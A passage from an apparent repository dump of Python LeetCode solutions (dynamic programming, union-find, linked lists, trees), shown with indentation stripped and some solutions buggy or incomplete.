if len(set(nums)) == len(nums):
return False
# else check index
else:
tempd = dict()
for idx, num in enumerate(nums):
if num not in tempd:
tempd[num] = idx
else:
if idx - tempd[num] <= k:
return True
tempd[num] = idx
return False
# if not equal to zero, do bucket sort
bucket = collections.OrderedDict()
b_size = t + 1
for num in nums:
key = num//b_size
if key in bucket:
return True
bucket[key] = num
if key - 1 in bucket and num - bucket[key - 1] <= t:
return True
if key + 1 in bucket and bucket[key + 1] - num <= t:
return True
# remove the first added key
if len(bucket) > k:
bucket.popitem(last = False)
return False
if __name__ == '__main__':
a = Solution()
b = a.containsNearbyAlmostDuplicate([1,2,3,4,5,1], 5, 0)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/221.maximal-square.py
```python
class Solution():
def maximalSquare(self, matrix):
if not matrix: return 0
M = len(matrix)
N = len(matrix[0])
dp = [[0] * N for _ in range(M)]
for i in range(M):
dp[i][0] = int(matrix[i][0])
for j in range(N):
dp[0][j] = int(matrix[0][j])
for i in range(1, M):
for j in range(1, N):
if int(matrix[i][j]) == 1:
dp[i][j] = min(dp[i][j - 1], dp[i - 1][j], dp[i - 1][j - 1]) + 1
return max(map(max, dp)) ** 2
if __name__ == '__main__':
a = Solution()
b = a.maximalSquare([["0","0","0","1"],["1","1","0","1"],["1","1","1","1"],["0","1","1","1"],["0","1","1","1"]])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/224.basic-calculator.py
```python
class Solution(object):
def calculate(self, s):
"""
:type s: str
:rtype: int
"""
res, num, sign = 0, 0, 1
stack = []
for c in s:
if c.isdigit():
num = 10 * num + int(c)
elif c == "+" or c == "-":
res = res + sign * num
num = 0
sign = 1 if c == "+" else -1
elif c == "(":
stack.append(res)
stack.append(sign)
res = 0
sign = 1
elif c == ")":
res = res + sign * num
num = 0
res *= stack.pop()
res += stack.pop()
res = res + sign * num
return res
# @lc code=end
```
#### File: leetcode/Python3/229.majority-element-ii.py
```python
import collections
# @lc code=start
class Solution:
def majorityElement(self, nums):
if not nums:
return []
mi = len(nums)/3
d = collections.defaultdict(int)
ans = []
for item in nums:
if d[item] <= mi:
d[item] += 1
if item not in ans and d[item] > mi:
ans.append(item)
return ans
# @lc code=end
if __name__ == '__main__':
a = Solution
b = a.majorityElement([3,2,3])
print(b)
```
#### File: leetcode/Python3/233.number-of-digit-one.py
```python
class Solution:
def countDigitOne(self, n):
"""
:type n: int
:rtype: int
"""
if n<=0:
return 0
ln=len(str(n))
if ln==1:
return 1
tmp1=10**(ln-1)
firstnum=n//tmp1
Fone = n%tmp1+1 if firstnum==1 else tmp1
other = firstnum*(ln-1)*(tmp1//10)
return Fone + other + self.countDigitOne(n % tmp1)
# @lc code=end
```
#### File: leetcode/Python3/243.shortest-word-distance.py
```python
class Solution:
def shortestDistance(self, words, word1, word2):
d = {word1: -1, word2: -1}
mi = float('inf')
if word1 == word2:
return
for i in range(len(words)):
if words[i] == word1:
d[word1] = i
if d[word2] != -1:
mi = min(abs(d[word1] - d[word2]), mi)
elif words[i] == word2:
d[word2] = i
if d[word1] != -1:
mi = min(abs(d[word1] - d[word2]), mi)
return mi
# @lc code=end
```
#### File: leetcode/Python3/247.strobogrammatic-number-ii.py
```python
import collections
# @lc code=start
class Solution:
d = {'0':'0', '1':'1', '6':'9', '8':'8', '9':'6'}
def findStrobogrammatic(self, n):
return self.helper(n, n)
def helper(self, n, k):
if k == 0:
return ['']
if k == 1:
return ['0', '1', '8']
res = []
for num in self.helper(n, k - 2):
for key, val in self.d.items():
if n != k or key != '0':
res.append(key + num + val)
return res
if __name__ == '__main__':
a = Solution()
b = a.findStrobogrammatic(6)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/250.count-univalue-subtrees.py
```python
class Solution:
def countUnivalSubtrees(self, root: TreeNode):
self.ans = 0
self.finder(root)
return self.ans
def finder(self, root):
if not root:
return True
l, r = self.finder(root.left), self.finder(root.right)
if l and r and (not root.left or root.left.val == root.val) and (not root.right or root.right.val == root.val):
self.ans += 1
return True
return False
# @lc code=end
```
#### File: leetcode/Python3/254.factor-combinations.py
```python
class Solution:
def getFactors(self, n: int):
self.ans = []
self.helper(n,[])
return self.ans
def helper(self, n, path):
if not path:
divider = 2
else:
divider = path[-1]
while divider <= n/divider:
if n % divider == 0:
path.append(divider)
path.append(n // divider)
self.ans.append(path.copy())
path.pop()
self.helper(n//divider, path)
path.pop()
divider += 1
if __name__ == '__main__':
a = Solution()
b = a.getFactors(12)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/258.add-digits.py
```python
class Solution:
def addDigits(self, num: int):
if num < 10:
return num
s = 0
while num > 0:
s += num%10
num = num //10
return self.addDigits(s)
# @lc code=end
```
#### File: leetcode/Python3/259.3-sum-smaller.py
```python
class Solution:
def threeSumSmaller(self, nums, target):
if not nums or len(nums) < 3:
return 0
if nums[0] + nums[1] + nums[2] > target:
return 0
nums.sort()
mx = len(nums)
ans = 0
for l in range(0, mx - 2):
if nums[l] + nums[l + 1] + nums[l + 2] >= target:
break
if nums[l] + nums[mx - 2] + nums[mx - 1] < target:
ans += (mx - 1 - l) * (mx - 2 - l) // 2
continue
m = l + 1
r = mx - 1
while m < r:
tmp = nums[l] + nums[m] + nums[r]
if tmp < target:
ans += r - m
m += 1
if tmp >= target:
r -= 1
return ans
# if __name__ == '__main__':
# a = Solution()
# b = a.threeSumSmaller([2,0,0,2,-2], 2)
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/25.reverse-nodes-in-k-group.py
```python
import collections
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def reverseKGroup(self, head, k):
dummy = ListNode(0)
dummy.next = head
cur = dummy
tplist = collections.deque()
counter = 0
while head:
# if the queue fulled, pop everyting inside it, let the current node connect to them
if counter == k:
while counter > 0:
cur.next = tplist.pop()
cur = cur.next
counter -= 1
# else put things to queue
else:
tplist.append(head)
head = head.next
counter += 1
# connect reversely if the rest queue is full
if len(tplist) == k:
while tplist:
cur.next = tplist.pop()
cur = cur.next
cur.next = None
# else connect without reverse
elif len(tplist) > 0:
while tplist:
cur.next = tplist.popleft()
cur = cur.next
return dummy.next
if __name__ == '__main__':
S = Solution()
l1 = ListNode(1)
l2 = ListNode(2)
# l3 = ListNode(3)
# l4 = ListNode(4)
# l5 = ListNode(5)
head = l1
l1.next = l2
l2.next = None
# l3.next = l4
# l4.next = l5
# l5.next = None
a = S.reverseKGroup(head, 2)
print(a)
# @lc code=end
```
#### File: leetcode/Python3/266.palindrome-permutation.py
```python
import collections
class Solution:
def canPermutePalindrome(self, s: str) -> bool:
d = collections.Counter(s)
c = 0
for k, v in d.items():
if v & 1:
if c > 0:
return False
c += 1
return True
# @lc code=end
```
#### File: leetcode/Python3/280.wiggle-sort.py
```python
class Solution:
def wiggleSort(self, nums):
"""
Do not return anything, modify nums in-place instead.
"""
if nums:
nums.sort()
for i in range(1, len(nums) - 1, 2):
nums[i], nums[i + 1] = nums[i + 1], nums[i]
# def swap(ls):
# for i in range(0, len(ls) - 1, 2):
# ls[i], ls[i + 1] = ls[i + 1], ls[i]
# return ls
# if __name__ == '__main__':
# newls = swap([1,2,3,4,5])
# print(newls)
# @lc code=end
```
#### File: leetcode/Python3/28.implement-str-str.py
```python
class Solution:
def strStr(self, haystack: str, needle: str) -> int:
return haystack.find(needle)
# @lc code=end
```
#### File: leetcode/Python3/290.word-pattern.py
```python
class Solution:
def wordPattern(self, pattern, str):
word_ls = str.split(' ')
d = dict()
if len(word_ls) != len(pattern):
return False
for i in range(len(pattern)):
if pattern[i] not in d:
d[pattern[i]] = word_ls[i]
else:
if d[pattern[i]]!=word_ls[i]:
return False
p = list(pattern)
if len(set(p)) != len(set(word_ls)):
return False
return True
if __name__ =='__main__':
a = Solution()
b = a.wordPattern("abba", "dog cat cat dog")
print(b)
# @lc code=end
```
#### File: leetcode/Python3/298.binary-tree-longest-consecutive-sequence.py
```python
class Solution:
def longestConsecutive(self, root: TreeNode):
self.mx = 0
self.dfs(root, float('-inf'), 0)
return self.mx
def dfs(self, node, preval, curlen):
if not node:
self.mx = max(self.mx, curlen)
return
if node.val - preval == 1:
curlen += 1
else:
self.mx = max(self.mx, curlen)
curlen = 1
self.dfs(node.left, node.val, curlen)
self.dfs(node.right, node.val, curlen)
# @lc code=end
```
#### File: leetcode/Python3/29.divide-two-integers.py
```python
class Solution:
def divide(self, dividend, divisor):
if abs(divisor) >abs(dividend):
return 0
count = 0
label = 1
if (dividend > 0 and divisor < 0) or (dividend < 0 and divisor > 0):
label = 0
dividend = abs(dividend)
divisor = abs(divisor)
res = self.helper(dividend, divisor, 0, 0, 0)
if label == 0:
res = -res
if res > 2 ** 31 - 1:
return 2 ** 31 - 1
if res < - 2 ** 31:
return - 2 ** 31
return res
def helper(self, dividend, divisor, current_s, count, temp_count):
# stop recursion
if dividend < divisor:
return count
# stop recursion
if dividend == divisor:
return count + 1
# init
if current_s == 0:
current_s = divisor
# init
if temp_count == 0:
temp_count = 1
# if current divisor (names temp count) * 2 is larger than dividend, than in next loop, try future divisor = current divisor * 2
if dividend > current_s + current_s:
return self.helper(dividend - current_s - current_s, divisor, current_s + current_s, count + temp_count + temp_count, temp_count + temp_count)
# if above step fail
if dividend > current_s:
return self.helper(dividend - current_s, divisor, current_s, count + temp_count, temp_count)
# else divisor start from the base divisor
if dividend > divisor:
return self.helper(dividend - divisor, divisor, divisor, count + 1, 1)
if __name__ == '__main__':
a = Solution()
b = a.divide(5, 1)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/305.number-of-islands-ii.py
```python
# if self.parent[i] != self.parent[self.parent[i]]:
# self.parent[i] = self.get_root(self.parent[i])
# return self.parent[i]
# def isconnected(self, node1, node2):
# return self.getmyroot(node1) == self.getmyroot(node2)
# def union(self, node1, node2):
# root1 = self.getmyroot(node1)
# root2 = self.getmyroot(node2)
# if self.rank[root1] >= self.rank[root2]:
# self.parent[root2] = root1
# self.rank[root1] += 1
# else:
# self.parent[root1] = root2
# self.rank[root2] += 1
# s = set()
# for k, v in self.parent.items():
# s.add(v)
# self.treenum = len(s)
# class Solution:
# def numIslands2(self, m: int, n: int, positions):
# dirs = [(1, 0), (-1, 0), (0, 1), (0, -1)]
# ans = []
# lands = [[0] * n for _ in range(m)]
# uf = uftree(m, n)
# for land in positions:
# lands[land[1]][land[0]] = 1
# uf.addnode(land[0], land[1])
# for d in dirs:
# new_y = land[0] + d[0]
# new_x = land[1] + d[1]
# if 0 <= new_x < n and 0 <= new_y < n:
# if lands[new_y][new_x] == 1:
# node1 = uf.encrypt(new_x, new_y)
# node2 = uf.encrypt(land[1], land[0])
# uf.union(node1, node2)
# ans.append(uf.treenum)
# return ans
# if __name__ == '__main__':
# a = Solution()
# b = a.numIslands2(3, 3, [[0,0], [0,1], [1,2], [2,1]])
# print(b)
class UnionFind:
def __init__(self, m, n):
self.father = {}
for i in range(n):
for j in range(m):
id = self.converttoId(i,j,m);
self.father[id] = id
def converttoId(self, x, y, m):
return x*m + y
def find(self, x):
parent = self.father[x]
while parent != self.father[parent]:
parent = self.father[parent]
return parent
def compressed_find(self, x):
parent = self.father[x]
while parent != self.father[parent]:
parent = self.father[parent]
temp = -1;
fa = self.father[x]
while fa != self.father[fa]:
temp = self.father[fa]
self.father[fa] = parent
fa = temp
return parent
def union(self, x, y):
fa_x = self.find(x)
fa_y = self.find(y)
if fa_x != fa_y:
self.father[fa_x] = fa_y
class Solution:
# @param {int} n an integer
# @param {int} m an integer
# @param {Pint[]} operators an array of point
# @return {int[]} an integer array
def numIslands2(self, n, m, operators):
dx = [0,-1, 0, 1]
dy = [1, 0, -1, 0]
island = [[0 for i in range(m)] for j in range(n)]
ans = []
uf = UnionFind(n, m)
count = 0
if operators != None:
for i in range(len(operators)):
count += 1
x = operators[i][0]
y = operators[i][1]
if island[x][y] != 1:
island[x][y] = 1
id = uf.converttoId(x, y, m)
# 计算上下左右四个点的位置
for j in range(4):
nx = x + dx[j]
ny = y + dy[j]
if 0 <= nx and nx < n and 0 <= ny and ny < m and island[nx][ny] == 1:
nid = uf.converttoId(nx, ny, m)
fa = uf.find(id)
nfa = uf.find(nid)
if fa != nfa:
count -= 1
uf.union(id, nid)
else:
count -= 1
ans.append(count)
return ans
if __name__ == '__main__':
a = Solution()
b = a.numIslands2(3, 3, [[0,0], [0,1], [1,2], [1,2]])
print(b)
# @lc code=end
```
#### File: leetcode/Python3/306.additive-number.py
```python
class Solution:
def isAdditiveNumber(self, num: str):
return self.dfs(num, [])
def dfs(self, num, path):
if len(path) >= 3 and path[-3] + path[-2] != path[-1]:
return False
if not num and len(path) >= 3:
return True
for i in range(len(num)):
cur = num[:i + 1]
if cur[0] == '0' and len(cur) != 1:
continue
if self.dfs(num[i + 1:], path + [int(cur)]):
return True
return False
# @lc code=end
```
#### File: leetcode/Python3/311.sparse-matrix-multiplication.py
```python
class Solution(object):
def multiply(self, A, B):
"""
:type A: List[List[int]]
:type B: List[List[int]]
:rtype: List[List[int]]
"""
m, n, l = len(A), len(A[0]), len(B[0])
res = [[0 for _ in range(l)] for _ in range(m)]
for i in range(m):
for k in range(n):
if A[i][k]:
for j in range(l):
res[i][j] += A[i][k] * B[k][j]
return res
# if __name__ =='__main__':
# a = Solution()
# b = a.multiply([[1,0,0],[-1,0,3]], [[7,0,0],[0,0,0],[0,0,1]])
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/319.bulb-switcher.py
```python
import math
class Solution:
def bulbSwitch(self, n: int) -> int:
return int(math.sqrt(n))
# @lc code=end
```
#### File: leetcode/Python3/320.generalized-abbreviation.py
```python
class Solution:
def generateAbbreviations(self, word: str):
if not word:
return [""]
ans = ['']
for i in range(len(word)):
temp = []
for item in ans:
temp.append(item + word[i])
if not item:
temp.append('1')
elif item[-1].isdigit():
temp.append(item[:-1] + str(int(item[-1]) + 1))
else:
temp.append(item + '1')
ans = temp
return ans
if __name__ == '__main__':
a = Solution()
b = a.generateAbbreviations('word')
print(b)
# @lc code=end
```
#### File: leetcode/Python3/322.coin-change.py
```python
import collections
class Solution:
def coinChange(self, coins: List[int], amount: int):
dp = [float('inf')] * (amount + 1)
dp[0] = 0
for i in range(amount + 1):
for j in range(len(coins)):
if coins[j] <= i:
dp[i] = min(dp[i], dp[i - coins[j]] + 1)
if dp[amount] != float('inf'):
return dp[amount]
return -1
# @lc code=end
```
#### File: leetcode/Python3/325.maximum-size-subarray-sum-equals-k.py
```python
class Solution:
def maxSubArrayLen(self, nums, k):
sums = dict()
ans = 0
cursum = 0
for i in range(len(nums)):
cursum += nums[i]
if cursum == k:
ans = i + 1
elif cursum - k in sums:
ans = max(ans, i - sums[cursum - k])
if cursum not in sums:
sums[cursum] = i
return ans
# if __name__ == '__main__':
# a = Solution()
# b = a.maxSubArrayLen([1, 1, 0], 1)
# print(b)
# @lc code=end
```
#### File: leetcode/Python3/326.power-of-three.py
```python
class Solution:
def isPowerOfThree(self, n: int) -> bool:
mx = 3 ** 19
return n > 0 and mx % n == 0
# @lc code=end
```
#### File: leetcode/Python3/328.odd-even-linked-list.py
```python
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def oddEvenList(self, head):
if not head:
return None
counter = 0
odd = ListNode(0)
even = ListNode(0)
oddstart = odd
evenstart = even
while head:
counter += 1
if counter & 1:
odd.next = head
odd = odd.next
else:
even.next = head
even = even.next
head = head.next
even.next = None
odd.next = evenstart.next
return oddstart.next
# @lc code=end
```
#### File: leetcode/Python3/32.longest-valid-parentheses.py
```python
class Solution:
def longestValidParentheses(self, s):
if not s:
return 0
l = 0
r = len(s)
while s[r - 1] == '(' and r > 0:
r -= 1
while s[l] == ')' and l < r - 2:
l += 1
s = s[l : r]
if len(s) < 2:
return 0
stack = [-1]
mx = 0
for i, p in enumerate(s):
if p == '(':
stack.append(i)
elif p == ')':
stack.pop()
if not stack:
stack.append(i)
else:
mx = max(mx, i - stack[-1])
return mx
# @lc code=end
```
#### File: leetcode/Python3/332.reconstruct-itinerary.py
```python
import collections
class Solution:
def findItinerary(self, tickets):
graph = collections.defaultdict(list)
city_counter = len(tickets) + 1
for pair in tickets:
graph[pair[0]].append(pair[1])
for k, v in graph.items():
v.sort(reverse = True)
res = []
self.dfs(graph, "JFK", res)
return res[::-1]
def dfs(self, graph, frm, res):
while graph[frm]:
nxt = graph[frm].pop()
self.dfs(graph, nxt, res)
res.append(frm)
# @lc code=end
if __name__ == '__main__':
a = Solution()
b = a.findItinerary([["JFK","SFO"],["JFK","ATL"],["SFO","ATL"],["ATL","JFK"],["ATL","SFO"]])
print(b)
```
#### File: leetcode/Python3/341.flatten-nested-list-iterator.py
```python
class NestedIterator:
def __init__(self, nestedList: [NestedInteger]):
self.ls = []
self.pos = 0
def getele(nest):
for ele in nest:
if ele.isInteger():
self.ls.append(ele)
else:
getele(ele.getList())
getele(nestedList)
def next(self) -> int:
if self.ls:
tmp = self.ls[self.pos]
self.pos += 1
return tmp
def hasNext(self) -> bool:
if self.pos < len(self.ls):
return True
return False
# Your NestedIterator object will be instantiated and called as such:
# i, v = NestedIterator(nestedList), []
# while i.hasNext(): v.append(i.next())
# @lc code=end
```
#### File: leetcode/Python3/361.bomb-enemy.py
```python
class Solution:
def maxKilledEnemies(self, grid: List[List[str]]) -> int:
def count(x, y):
left, right, up, down = 0, 0, 0, 0
for i in range(x-1, -1, -1):
if grid[i][y] == 'W':
break
if grid[i][y] == 'E':
left += 1
for i in range(x+1, row):
if grid[i][y] == 'W':
break
if grid[i][y] == 'E':
right += 1
for j in range(y+1, col):
if grid[x][j] == 'W':
break
if grid[x][j] == 'E':
up += 1
for j in range(y-1, -1, -1):
if grid[x][j] == 'W':
break
if grid[x][j] == 'E':
down += 1
return left+right+up+down
if not grid:
return 0
row, col = len(grid), len(grid[0])
ans = 0
for i in range(row):
for j in range(col):
if grid[i][j] == '0':
# count the num of enemies
ans = max(ans, count(i, j))
return ans
# @lc code=end
```
#### File: leetcode/Python3/371.sum-of-two-integers.py
```python
class Solution:
def getSum(self, a, b):
mask = (1 << 32) - 1
while (b & mask) > 0:
mid = (a & b) << 1
a = a ^ b
b = mid
if b > 0:
return a & mask
return a
if __name__ == '__main__':
a = Solution()
b = a.getSum(2,3)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/374.guess-number-higher-or-lower.py
```python
class Solution:
def guessNumber(self, n: int):
def binarysearch(start, end):
mid = (start + end)//2
if guess(mid) == 0:
return mid
elif guess(mid) == 1:
return binarysearch(mid + 1, end)
else:
return binarysearch(start, mid)
return binarysearch(1, n + 1)
# @lc code=end
```
#### File: leetcode/Python3/375.guess-number-higher-or-lower-ii.py
```python
class Solution(object):
def getMoneyAmount(self, n):
"""
:type n: int
:rtype: int
"""
dp = [[0] * (n + 1) for _ in range(n + 1)]
res = self.solve(dp, 1, n)
return res
def solve(self, dp, L, R):
if L >= R: return 0
if dp[L][R]: return dp[L][R]
dp[L][R] = min(i + max(self.solve(dp, L, i - 1), self.solve(dp, i + 1, R)) for i in range(L, R + 1))
return dp[L][R]
if __name__ == '__main__':
a = Solution()
b = a.getMoneyAmount(10)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/380.insert-delete-get-random-o-1.py
```python
import random
class RandomizedSet:
def __init__(self):
"""
Initialize your data structure here.
"""
self.d = dict()
self.vals = []
self.length = 0
def insert(self, val: int):
"""
Inserts a value to the set. Returns true if the set did not already contain the specified element.
"""
if val not in self.d:
self.d[val] = self.length
self.length += 1
self.vals.append(val)
return True
return False
def remove(self, val: int):
"""
Removes a value from the set. Returns true if the set contained the specified element.
"""
if val in self.d:
idx = self.d.pop(val)
self.vals[idx] = self.vals[-1]
self.vals.pop()
if idx != len(self.vals):
self.d[self.vals[idx]] = idx
self.length -= 1
return True
return False
def getRandom(self):
"""
Get a random element from the set.
"""
idx = random.randint(0, self.length - 1)
return self.vals[idx]
# Your RandomizedSet object will be instantiated and called as such:
# obj = RandomizedSet()
# param_1 = obj.insert(val)
# param_2 = obj.remove(val)
# param_3 = obj.getRandom()
# @lc code=end
```
#### File: leetcode/Python3/381.insert-delete-get-random-o-1-duplicates-allowed.py
```python
import random
import collections
class RandomizedCollection:
def __init__(self):
"""
Initialize your data structure here.
"""
self.valList = list()
self.valToIndices = collections.defaultdict(set)
def insert(self, val):
"""
Inserts a value to the collection. Returns true if the collection did not already contain the specified element.
:type val: int
:rtype: bool
"""
ret = ( val in self.valToIndices )
self.valToIndices[ val ].add( len(self.valList) )
self.valList.append( val )
def remove(self, val):
"""
Removes a value from the collection. Returns true if the collection contained the specified element.
:type val: int
:rtype: bool
"""
if val not in self.valToIndices:
return False
if self.valList[-1] == val: # easy case, last one is val, so we simply remove last one
self.valList.pop()
self.valToIndices[val].remove( len(self.valList) )
else:
# difficult case, last one is not val, so we need to find a index of val, and make that index have lastVal
lastVal = self.valList.pop()
self.valToIndices[ lastVal ].remove( len(self.valList) )
swapIdx = self.valToIndices[ val ].pop()
self.valList[ swapIdx ] = lastVal
self.valToIndices[ lastVal ].add( swapIdx )
if not self.valToIndices[val]:
del self.valToIndices[ val ]
return True
def getRandom(self):
"""
Get a random element from the collection.
:rtype: int
"""
return random.choice( self.valList )
# Your RandomizedCollection object will be instantiated and called as such:
# obj = RandomizedCollection()
# obj.insert(4)
# obj.insert(3)
# obj.insert(4)
# obj.insert(2)
# obj.insert(4)
# obj.remove(4)
# obj.remove(3)
# obj.remove(4)
# obj.remove(4)
# @lc code=end
def regularize(lsofls, reg = False):
# if reg == True
if reg:
for ls in lsofls:
divider = sum(ls)
for i in range(len(ls)):
# divide each element by sum if the current list, and change them inplace
# remenber, the origional problem requires you to keep 4 digits, so use round
ls[i] = round(ls[i]/divider, 4)
return lsofls
# else if reg == False, do nothing.
return lsofls
```
#### File: leetcode/Python3/38.count-and-say.py
```python
class Solution:
def countAndSay(self, n):
if n == 1:
return '1'
init = '1'
for _ in range(1, n):
init = self.helper(init)
return init
def helper(self, s):
counter = 1
res = ""
label = 0
for i in range(len(s) - 1):
if s[i] == s[i + 1]:
counter += 1
label = 0
else:
res = res + str(counter) + str(s[i])
counter = 1
label = 1
if label == 1:
res = res + '1' + str(s[len(s) - 1])
else:
res = res + str(counter) + str(s[len(s) - 1])
return res
# @lc code=end
```
#### File: leetcode/Python3/392.is-subsequence.py
```python
class Solution:
def isSubsequence(self, s, t):
if len(s) == 0:
return True
if len(t) == 0:
return False
for i in range(len(t)):
if s[0] == t[i]:
return self.isSubsequence(s[1:], t[i + 1 :])
return False
if __name__ == '__main__':
a = Solution()
b = a.isSubsequence("abc", "ahbgdc")
print(b)
# @lc code=end
```
#### File: leetcode/Python3/39.combination-sum.py
```python
class Solution:
def combinationSum(self, candidates, target):
if len(candidates) == 0:
return []
candidates.sort()
self.ans = []
self.helper(candidates, [], target, 0)
return self.ans
def helper(self, candidates, ls, remain, last_num):
if remain == 0 :
self.ans.append(ls)
if remain < candidates[0]:
return
for item in candidates:
if item > remain:
return
if item < last_num:
continue
self.helper(candidates, ls + [item], remain - item, item)
if __name__ == '__main__':
a = Solution()
b = a.combinationSum([10,1,2,7,6,1,5], 8)
print(b)
# @lc code=end
```
#### File: leetcode/Python3/416.partition-equal-subset-sum.py
```python
class Solution:
def canPartition(self, nums):
"""
:type nums: List[int]
:return: bool
"""
s = sum(nums)
# if sum is an odd number
if s & 1:
return False
target = s//2
if max(nums) > target:
return False
nums.sort(reverse = True)
return self.dfs(nums, 0, target)
def dfs(self, nums, idx, target):
if target == 0:
return True
if target < 0:
return
for i in range(idx, len(nums)):
if self.dfs(nums, i + 1, target - nums[i]):
return True
return False
# class Solution:
# def canPartition(self, nums):
# """
# :type nums: List[int]
# :rtype: bool
# """
# def dfs(start, target):
# if target < 0:
# return
# if target == 0:
# return True
# for i in range(start, len(nums)):
# if dfs(i+1, target - nums[i]):
# return True
# return False
# s = sum(nums)
# if s % 2 != 0:
# return False
# nums.sort(reverse = True)
# return dfs(0, s//2)
a = Solution()
b = a.canPartition([2, 2, 1, 1])
print(b)
# class Solution:
# def canPartition(self, nums: List[int]) -> bool:
# #Time Complexity: O(n)
# #Space Complexity: O(n)
# Sum = sum(nums)
# if Sum % 2 == 1:
# return False
# Sum = Sum//2
# n = len(nums)
# dp = [0]*(Sum+1)
# dp[0] = 1
# for i in range(1, n+1):
# dp_new = dp.copy()
# for j in range(1, Sum+1):
# if j - nums[i-1] >= 0 and dp[j-nums[i-1]]:
# dp_new[j] = 1
# dp = dp_new
# return dp[-1]
# @lc code=end
```
#### File: leetcode/Python3/421.maximum-xor-of-two-numbers-in-an-array.py
```python
class Solution:
def findMaximumXOR(self, nums: List[int]):
ans = 0
mask = 0
for i in range(31, -1, -1):
mask |= 1 << i
pre = {num & mask for num in nums}
curguess = ans | 1 << i
for prefix in pre:
if prefix ^ curguess in pre:
ans = curguess
break
return ans
# @lc code=end
```
#### File: leetcode/Python3/426.convert-binary-search-tree-to-sorted-doubly-linked-list.py
```python
class Solution:
def treeToDoublyList(self, root: 'Node'):
if not root:
return
self.vals = []
self.travel_tree(root)
head = Node(0)
prenode = head
for val in self.vals:
curnode = Node(val)
curnode.left = prenode
if prenode:
prenode.right = curnode
prenode = curnode
prenode.right = head.right
head.right.left = prenode
return head.right
def travel_tree(self, node):
if not node:
return
self.travel_tree(node.left)
self.vals.append(node.val)
self.travel_tree(node.right)
# @lc code=end
```
#### File: leetcode/Python3/429.n-ary-tree-level-order-traversal.py
```python
class Solution(object):
def levelOrder(self, root):
"""
:type root: Node
:rtype: List[List[int]]
"""
res = []
que = collections.deque()
que.append(root)
while que:
level = []
size = len(que)
for _ in range(size):
node = que.popleft()
if not node:
continue
level.append(node.val)
for child in node.children:
que.append(child)
if level:
res.append(level)
return res
# @lc code=end
```
#### File: leetcode/Python3/42.trapping-rain-water.py
```python
class Solution:
def trap(self, height: List[int]) -> int:
if not height:
return 0
vol = 0
l = len(height)
left = l * [0]
right = l * [0]
left[0] = height[0]
for i in range(1, l):
left[i] = max(height[i], left[i - 1])
right[l-1] = height[l - 1]
for i in range(l -2, -1, -1):
right[i] = max(right[i + 1], height[i])
for i in range(1, l-1):
vol += min(left[i], right[i]) - height[i]
return vol
# @lc code=end
```
#### File: leetcode/Python3/430.flatten-a-multilevel-doubly-linked-list.py
```python
class Solution:
def flatten(self, head: 'Node') -> 'Node':
if not head:
return
save_ls = []
pointer = head
def traveller(head):
if head.child:
if head.next:
save_ls.append(head.next)
head.next = head.child
head.child = None
head.next.prev = head
head = head.next
elif head.next:
head = head.next
elif save_ls:
newnxt = save_ls.pop()
head.next = newnxt
newnxt.prev = head
head = newnxt
else:
return
traveller(head)
traveller(pointer)
return head
# @lc code=end
```
#### File: leetcode/Python3/447.number-of-boomerangs.py
```python
import collections
# @lc code=start
class Solution:
def numberOfBoomerangs(self, points):
"""
:type points: List[List[int]]
:rtype: int
"""
res = 0
for p0 in points:
d = collections.defaultdict(int)
for p1 in points:
d[(p0[0] - p1[0]) ** 2 + (p0[1] - p1[1]) ** 2] += 1
for d, v in d.items():
res += v * (v - 1)
return res
# @lc code=end
```
#### File: leetcode/Python3/461.hamming-distance.py
```python
class Solution:
def hammingDistance(self, x: int, y: int):
if x == y:
return 0
cnt = 0
while x > 0 or y > 0:
if x & 1 != y & 1:
cnt += 1
x = x >> 1
y = y >> 1
return cnt
# @lc code=end
```
#### File: leetcode/Python3/462.minimum-moves-to-equal-array-elements-ii.py
```python
class Solution:
def minMoves2(self, nums: List[int]) -> int:
l = 0
r = len(nums) - 1
ans = 0
nums.sort()
while l < r:
ans += nums[r] - nums[l]
r -= 1
l += 1
return ans
# @lc code=end
```
#### File: leetcode/Python3/474.ones-and-zeroes.py
```python
import collections
# @lc code=start
class Solution:
def findMaxForm(self, strs, m, n):
"""
:type strs: List[str]
:type m: int
:type n: int
:rtype: int
"""
dp = [[0 for _ in range(n + 1)] for _ in range(m + 1)]
for str in strs:
zeros, ones = 0, 0
for c in str:
if c == "0":
zeros += 1
elif c == "1":
ones += 1
for i in range(m, zeros - 1, -1):
for j in range(n, ones - 1, -1):
dp[i][j] = max(dp[i][j], dp[i - zeros][j - ones] + 1)
return dp[m][n]
# @lc code=end
```
#### File: leetcode/Python3/47.permutations-ii.py
```python
class Solution:
def permuteUnique(self, nums) :
if nums == []:
return []
# sort it first for prev to work
nums.sort()
self.ans = []
self.dfs(nums ,[])
return self.ans
def dfs(self, nums, ls):
# you can also use None or anything that will not equal to the number inside nums
prev = float('inf')
if not nums:
self.ans.append(ls)
for i in range(len(nums)):
# example: for [1,1,2], the second '1' will be skipped
if nums[i] == prev:
continue
prev = nums[i]
self.dfs(nums[:i] + nums[i + 1:len(nums)], ls + [nums[i]])
# @lc code=end
```
#### File: leetcode/Python3/497.random-point-in-non-overlapping-rectangles.py
```python
class Solution:
def __init__(self, rects):
"""
:type rects: List[List[int]]
"""
self.rects = rects
self.N = len(rects)
areas = [(x2 - x1 + 1) * (y2 - y1 + 1) for x1, y1, x2, y2 in rects]
self.preSum = [0] * self.N
self.preSum[0] = areas[0]
for i in range(1, self.N):
self.preSum[i] = self.preSum[i - 1] + areas[i]
self.total = self.preSum[-1]
def pickRect(self):
rand = random.randint(0, self.total - 1)
return bisect.bisect_right(self.preSum, rand)
def pickPoint(self, rect):
x1, y1, x2, y2 = rect
x = random.randint(x1, x2)
y = random.randint(y1, y2)
return x, y
def pick(self):
"""
:rtype: List[int]
"""
rectIndex = self.pickRect()
rect = self.rects[rectIndex]
return self.pickPoint(rect)
# Your Solution object will be instantiated and called as such:
# obj = Solution(rects)
# param_1 = obj.pick()
# @lc code=end
```
#### File: leetcode/Python3/500.keyboard-row.py
```python
class Solution:
def findWords(self, words):
"""
:type words: List[str]
